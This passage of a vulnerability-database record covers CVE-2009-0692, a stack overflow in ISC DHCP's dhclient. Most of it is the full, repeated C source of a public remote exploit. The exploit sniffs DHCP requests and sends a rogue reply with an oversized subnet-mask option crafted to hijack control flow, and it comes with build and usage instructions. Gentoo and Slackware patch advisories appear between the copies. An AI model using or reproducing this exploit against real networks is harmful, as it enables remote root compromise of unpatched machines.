{\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf("[+] snarfed DHCP request from %s with xid 0x%08x\\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\r\n\tprintf("[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, "\\x04\\x00\\x00\\x00", 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h->op = DHCP_OP_REPLY;\r\n\tmemcpy(&dhcp_h->yiaddr, &yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, "\\x35\\x01\\x05", 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, "\\x36\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x33\\x04\\x00\\x09\\x3a\\x80", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x03\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x06\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, "\\x01", 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, &payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, "\\xff", 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\\xc1\\x1e\\x20\\x09\\x06\\x92", ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, "[-] error opening raw socket on %s\\n", dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, "usage: %s [-i interface]\\n", argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, "i:")) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase 'i':\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, "[-] couldn't find default interface: %s\\n", errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, "[-] couldn't open interface %s: %s\\n", dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't parse BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't set BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] listening on %s: %s\\n", dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67020"}, {"lastseen": "2017-11-19T18:40:50", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-11-10T00:00:00", "published": "2009-11-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-14375", "id": "SSV:14375", "title": "ISC DHCP 'dhclient' 'script_write_params()' Stack Buffer Overflow Vulnerability", "type": "seebug", "sourceData": "\n /*\r\n * cve-2009-0692.c\r\n *\r\n * ISC DHCP dhclient < 3.1.2p1 Remote Exploit\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n * \r\n * Information:\r\n * \r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\r\n * \r\n * Stack-based buffer overflow in the script_write_params method in \r\n * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \r\n * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \r\n * execute arbitrary code via a crafted subnet-mask option.\r\n * \r\n * Usage:\r\n *\r\n * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet\r\n * $ sudo ./cve-2009-0692\r\n * [+] listening on eth0: ip and udp and src port 68 and dst port 67\r\n * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920\r\n * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920\r\n *\r\n * $ gdb /sbin/dhclient\r\n * ...\r\n * DHCPREQUEST on eth0 to 255.255.255.255 port 67\r\n * DHCPACK from 0.6.9.2\r\n * ...\r\n * Program received signal SIGSEGV, Segmentation fault.\r\n * 0x41414141 in ?? ()\r\n * \r\n * Notes:\r\n * \r\n * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free\r\n * to tweak for your target platform. Depends on libdnet and libpcap.\r\n *\r\n * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \r\n * stack during our overflow. After a successful return from the vulnerable\r\n * script_write_params function, EIP will be set to JMP_TARGET.\r\n *\r\n * Exclusively for use at DEFCON next week. ;-) \r\n */\r\n\r\n#include <ctype.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n#include <dnet.h>\r\n#include <pcap.h>\r\n\r\n#define READABLE_1 "\\xa8\\xfc\\x0b\\x08" /* for es.client */\r\n#define READABLE_2 "\\xbc\\x34\\x0a\\x08" /* for es.prefix */\r\n#define JMP_TARGET "\\x41\\x41\\x41\\x41"\r\n\r\n#define BPF_FILTER "ip and udp and src port 68 and dst port 67"\r\n#define PKT_BUFSIZ 1514\r\n#define DHCP_OP_REQUEST 1\r\n#define DHCP_OP_REPLY 2\r\n#define DHCP_TYPE_REQUEST 3\r\n#define DHCP_TYPE_ACK 5\r\n#define DHCP_OPT_REQIP 50\r\n#define DHCP_OPT_MSGTYPE 53\r\n#define DHCP_OPT_END 255\r\n#define DHCP_CHADDR_LEN 16\r\n#define SERVERNAME_LEN 64\r\n#define BOOTFILE_LEN 128\r\n#define DHCP_HDR_LEN 240\r\n#define DHCP_OPT_HDR_LEN 2\r\n\r\n#ifndef __GNUC__\r\n# define __attribute__(x)\r\n# pragma pack(1)\r\n#endif\r\n\r\nstruct dhcp_hdr {\r\n\tuint8_t op;\r\n\tuint8_t hwtype;\r\n\tuint8_t hwlen;\r\n\tuint8_t hwopcount;\r\n\tuint32_t xid;\r\n\tuint16_t secs;\r\n\tuint16_t flags;\r\n\tuint32_t ciaddr;\r\n\tuint32_t yiaddr;\r\n\tuint32_t siaddr;\r\n\tuint32_t giaddr;\r\n\tuint8_t chaddr[DHCP_CHADDR_LEN];\r\n\tuint8_t servername[SERVERNAME_LEN];\r\n\tuint8_t bootfile[BOOTFILE_LEN];\r\n\tuint32_t cookie;\r\n} __attribute__((__packed__));\r\n\r\nstruct dhcp_opt {\r\n\tuint8_t opt;\r\n\tuint8_t len;\r\n} __attribute__((__packed__));\r\n\r\n#ifndef __GNUC__\r\n# pragma pack()\r\n#endif\r\n\r\nvoid\r\nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt)\r\n{\r\n\teth_t *raw;\r\n\tstruct ip_hdr *ip_h;\r\n\tstruct eth_hdr *eth_h;\r\n\tstruct udp_hdr *udp_h;\r\n\tstruct dhcp_hdr *dhcp_h;\r\n\tstruct dhcp_opt *dhcp_opt;\r\n\tchar *dev = data, *ptr;\r\n\tchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ];\r\n\tint opt_len, clen = pkthdr->caplen;\r\n\tuint8_t msg_type = 0, payload_len = 0;\r\n\tuint32_t yiaddr = 0;\r\n\r\n\t/* packet too short */\r\n\tif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) {\r\n\t\treturn;\r\n\t}\r\n\r\n\teth_h = (struct eth_hdr *) pkt;\r\n\tip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN);\r\n\tudp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN);\r\n\tdhcp_h = (struct dhcp_hdr *) ((char *) udp_h + UDP_HDR_LEN);\r\n\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN);\r\n\r\n\t/* only care about REQUEST opcodes */\r\n\tif (dhcp_h->op != DHCP_OP_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\t/* parse DHCP options */\r\n\twhile (1) {\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_MSGTYPE) {\r\n\t\t\tif (dhcp_opt->len != 1) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_REQIP) {\r\n\t\t\tif (dhcp_opt->len != 4) {\r\n\t\t\t\treturn;\r\n\t\t\t}\r\n\t\t\tmemcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len);\r\n\t\t}\r\n\t\tif (dhcp_opt->opt == DHCP_OPT_END) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tif (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) {\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tdhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len);\r\n\t}\r\n\r\n\t/* only care about REQUEST msg types */\r\n\tif (msg_type != DHCP_TYPE_REQUEST) {\r\n\t\treturn;\r\n\t}\r\n\r\n\tprintf("[+] snarfed DHCP request from %s with xid 0x%08x\\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);\r\n\tprintf("[+] sending malicious DHCP response to %s with xid 0x%08x\\n\\n", eth_ntoa(&eth_h->eth_src), dhcp_h->xid);\r\n\r\n\t/* construct stack payload */\r\n\tmemset(payload, 0, sizeof(payload));\r\n\tptr = payload;\r\n\tmemset(ptr, 0, 16);\r\n\tptr += 16;\r\n\tmemcpy(ptr, READABLE_1, 4);\r\n\tptr += 4;\r\n\tmemcpy(ptr, READABLE_2, 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 8);\r\n\tptr += 8;\r\n\tmemcpy(ptr, "\\x04\\x00\\x00\\x00", 4);\r\n\tptr += 4;\r\n\tmemset(ptr, 0, 28);\r\n\tptr += 28;\r\n\tmemcpy(ptr, JMP_TARGET, 4);\r\n\tptr += 4;\r\n\tpayload_len = ptr - payload;\r\n\r\n\t/* dhcp header */\r\n\tdhcp_h->op = DHCP_OP_REPLY;\r\n\tmemcpy(&dhcp_h->yiaddr, &yiaddr, 4);\r\n\r\n\t/* normal dhcp options */\r\n\tmemset(options, 0, sizeof(options));\r\n\tptr = options;\r\n\tmemcpy(ptr, "\\x35\\x01\\x05", 3);\r\n\tptr += 3;\r\n\tmemcpy(ptr, "\\x36\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x33\\x04\\x00\\x09\\x3a\\x80", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x03\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\tmemcpy(ptr, "\\x06\\x04\\x00\\x06\\x09\\x02", 6);\r\n\tptr += 6;\r\n\r\n\t/* malicious subnet mask option */\r\n\tmemcpy(ptr, "\\x01", 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, &payload_len, 1);\r\n\tptr += 1;\r\n\tmemcpy(ptr, payload, payload_len);\r\n\tptr += payload_len;\r\n\r\n\tmemcpy(ptr, "\\xff", 1);\r\n\tptr += 1;\r\n\topt_len = ptr - options;\r\n\r\n\t/* construct full packet payload */\r\n\tmemset(pktbuf, 0, sizeof(pktbuf));\r\n\tptr = pktbuf;\r\n\r\n\teth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\\xc1\\x1e\\x20\\x09\\x06\\x92", ETH_TYPE_IP);\r\n\tptr += ETH_HDR_LEN;\r\n\r\n\tip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST);\r\n\tptr += IP_HDR_LEN;\r\n\r\n\tudp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\tptr += UDP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, dhcp_h, DHCP_HDR_LEN);\r\n\tptr += DHCP_HDR_LEN;\r\n\r\n\tmemcpy(ptr, options, opt_len);\r\n\tptr += opt_len;\r\n\r\n\tip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\r\n\t/* fire off malicious response */\r\n\traw = eth_open(dev);\r\n\tif (!raw) {\r\n\t\tfprintf(stderr, "[-] error opening raw socket on %s\\n", dev);\r\n\t\texit(1);\r\n\t}\r\n\teth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len);\r\n\teth_close(raw);\r\n}\r\n\r\nvoid\r\nusage(char **argv)\r\n{\r\n\tfprintf(stderr, "usage: %s [-i interface]\\n", argv[0]);\r\n\texit(1);\r\n}\r\n\r\nint\r\nmain(int argc, char **argv)\r\n{\r\n\tint ch, ret;\r\n\tchar *dev = NULL;\r\n\tchar errbuf[PCAP_ERRBUF_SIZE];\r\n\tstruct bpf_program bfp;\r\n\tpcap_t *ph;\r\n\t\r\n\topterr = 0;\r\n\r\n\twhile ((ch = getopt(argc, argv, "i:")) != -1) {\r\n\t\tswitch (ch) {\r\n\t\tcase 'i':\r\n\t\t\tdev = optarg;\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tusage(argv);\r\n\t\t}\r\n\t}\r\n\r\n\tif (!dev) {\r\n\t\tdev = pcap_lookupdev(errbuf);\r\n\t\tif (!dev) {\r\n\t\t\tfprintf(stderr, "[-] couldn't find default interface: %s\\n", errbuf);\r\n\t\t\texit(1);\r\n\t\t}\r\n\t}\r\n\r\n\tph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);\r\n\tif (!ph) {\r\n\t\tfprintf(stderr, "[-] couldn't open interface %s: %s\\n", dev, errbuf);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't parse BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tpcap_setfilter(ph, &bfp);\r\n\tif (ret == -1) {\r\n\t\tfprintf(stderr, "[-] couldn't set BPF filter: %s\\n", pcap_geterr(ph));\r\n\t\texit(1);\r\n\t}\r\n\r\n\tprintf("[+] listening on %s: %s\\n", dev, BPF_FILTER);\r\n\r\n\tpcap_loop(ph, -1, process, dev);\r\n\r\n\treturn 0;\r\n}\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-14375"}], "gentoo": [{"lastseen": "2016-09-06T19:46:57", "bulletinFamily": "unix", "description": "### Background\n\nISC DHCP is the reference implementation of the Dynamic Host Configuration Protocol as specified in RFC 2131. \n\n### Description\n\nThe Mandriva Linux Engineering Team has reported a stack-based buffer overflow in the subnet-mask handling of dhclient. \n\n### Impact\n\nA remote attacker might set up a rogue DHCP server in a victim's local network, possibly leading to the execution of arbitrary code with root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll ISC DHCP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/dhcp-3.1.1-r1\"", "modified": "2009-07-14T00:00:00", "published": "2009-07-14T00:00:00", "id": "GLSA-200907-12", "href": "https://security.gentoo.org/glsa/200907-12", "type": "gentoo", "title": "ISC DHCP: dhcpclient Remote execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T02:36:35", "bulletinFamily": "unix", "description": "New dhcp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, and -current to fix a security issue with dhclient.\n\nNote that dhclient is not the default DHCP client in Slackware's networking\nscripts, dhcpcd is. However, if you use dhclient on a network where someone\ncould deploy a hostile DHCP server, you should upgrade to the new package.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/dhcp-3.1.2p1-i486-1_slack12.2.tgz: Upgraded.\n A stack overflow vulnerability was fixed in dhclient that could allow\n remote attackers to execute arbitrary commands as root on the system,\n or simply terminate the client, by providing an over-long subnet-mask\n option.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/dhcp-3.1.2p1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/dhcp-3.1.2p1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/dhcp-3.1.2p1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/dhcp-3.1.2p1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/dhcp-3.1.2p1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/dhcp-3.1.2p1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/dhcp-3.1.2p1-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/dhcp-3.1.2p1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dhcp-3.1.2p1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/dhcp-3.1.2p1-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dhcp-3.1.2p1-i486-1.txz\n\nUpdated package for Slackware64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/dhcp-3.1.2p1-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\n01143b6e39f09c606f962c79b6437598 dhcp-3.1.2p1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n93492796e78bc44e8ad92185ea65083b dhcp-3.1.2p1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n88c3c2242439b838f99c6e518db4a28e dhcp-3.1.2p1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\ne0ebe048f8e655cd9cd0e2767b4da486 dhcp-3.1.2p1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\nac2ada2ca250bbd21872dd58b4775c77 dhcp-3.1.2p1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n33a95808d59b77e9fb83635478d5ea2f dhcp-3.1.2p1-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\ne02bb8e11adeecc44b0f5d38cb06bdf3 dhcp-3.1.2p1-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\n309a1a3140899da2d9bf8405cee04a30 dhcp-3.1.2p1-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n99be31135ef2b815ae4ac7eb2705abcf dhcp-3.1.2p1-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n967911d55d67c85ae4d61828c3e5859a dhcp-3.1.2p1-i486-1_slack12.2.tgz\n\nSlackware -current package:\n5b328e631b47e61433d347b1836e07d6 dhcp-3.1.2p1-i486-1.txz\n\nSlackware64 -current package:\nb4e120017ff3a0b4a21e7fd832c6216c dhcp-3.1.2p1-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg dhcp-3.1.2p1-i486-1_slack12.2.tgz", "modified": "2009-07-14T17:34:59", "published": "2009-07-14T17:34:59", "id": "SSA-2009-195-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.561471", "title": "dhcp", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:25:18", "bulletinFamily": "exploit", "description": "", "modified": "2009-07-28T00:00:00", "published": "2009-07-28T00:00:00", "href": "https://packetstormsecurity.com/files/79651/ISC-DHCP-dhclient-Buffer-Overflow.html", "id": "PACKETSTORM:79651", "type": "packetstorm", "title": "ISC DHCP dhclient Buffer Overflow", "sourceData": "`/* \n* cve-2009-0692.c \n* \n* ISC DHCP dhclient < 3.1.2p1 Remote Exploit \n* Jon Oberheide <jon@oberheide.org> \n* http://jon.oberheide.org \n* \n* Information: \n* \n* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 \n* \n* Stack-based buffer overflow in the script_write_params method in \n* client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before \n* 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to \n* execute arbitrary code via a crafted subnet-mask option. \n* \n* Usage: \n* \n* $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet \n* $ sudo ./cve-2009-0692 \n* [+] listening on eth0: ip and udp and src port 68 and dst port 67 \n* [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920 \n* [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920 \n* \n* $ gdb /sbin/dhclient \n* ... \n* DHCPREQUEST on eth0 to 255.255.255.255 port 67 \n* DHCPACK from 0.6.9.2 \n* ... \n* Program received signal SIGSEGV, Segmentation fault. \n* 0x41414141 in ?? () \n* \n* Notes: \n* \n* Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free \n* to tweak for your target platform. Depends on libdnet and libpcap. \n* \n* READABLE_1 and READABLE_2 need to be readable addresses as we fix up the \n* stack during our overflow. After a successful return from the vulnerable \n* script_write_params function, EIP will be set to JMP_TARGET. \n* \n* Exclusively for use at DEFCON next week. ;-) \n*/ \n \n#include <ctype.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <stdint.h> \n#include <string.h> \n#include <unistd.h> \n#include <dnet.h> \n#include <pcap.h> \n \n#define READABLE_1 \"\\xa8\\xfc\\x0b\\x08\" /* for es.client */ \n#define READABLE_2 \"\\xbc\\x34\\x0a\\x08\" /* for es.prefix */ \n#define JMP_TARGET \"\\x41\\x41\\x41\\x41\" \n \n#define BPF_FILTER \"ip and udp and src port 68 and dst port 67\" \n#define PKT_BUFSIZ 1514 \n#define DHCP_OP_REQUEST 1 \n#define DHCP_OP_REPLY 2 \n#define DHCP_TYPE_REQUEST 3 \n#define DHCP_TYPE_ACK 5 \n#define DHCP_OPT_REQIP 50 \n#define DHCP_OPT_MSGTYPE 53 \n#define DHCP_OPT_END 255 \n#define DHCP_CHADDR_LEN 16 \n#define SERVERNAME_LEN 64 \n#define BOOTFILE_LEN 128 \n#define DHCP_HDR_LEN 240 \n#define DHCP_OPT_HDR_LEN 2 \n \n#ifndef __GNUC__ \n# define __attribute__(x) \n# pragma pack(1) \n#endif \n \nstruct dhcp_hdr { \nuint8_t op; \nuint8_t hwtype; \nuint8_t hwlen; \nuint8_t hwopcount; \nuint32_t xid; \nuint16_t secs; \nuint16_t flags; \nuint32_t ciaddr; \nuint32_t yiaddr; \nuint32_t siaddr; \nuint32_t giaddr; \nuint8_t chaddr[DHCP_CHADDR_LEN]; \nuint8_t servername[SERVERNAME_LEN]; \nuint8_t bootfile[BOOTFILE_LEN]; \nuint32_t cookie; \n} __attribute__((__packed__)); \n \nstruct dhcp_opt { \nuint8_t opt; \nuint8_t len; \n} __attribute__((__packed__)); \n \n#ifndef __GNUC__ \n# pragma pack() \n#endif \n \nvoid \nprocess(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt) \n{ \neth_t *raw; \nstruct ip_hdr *ip_h; \nstruct eth_hdr *eth_h; \nstruct udp_hdr *udp_h; \nstruct dhcp_hdr *dhcp_h; \nstruct dhcp_opt *dhcp_opt; \nchar *dev = data, *ptr; \nchar pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ]; \nint opt_len, clen = pkthdr->caplen; \nuint8_t msg_type = 0, payload_len = 0; \nuint32_t yiaddr = 0; \n \n/* packet too short */ \nif (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) { \nreturn; \n} \n 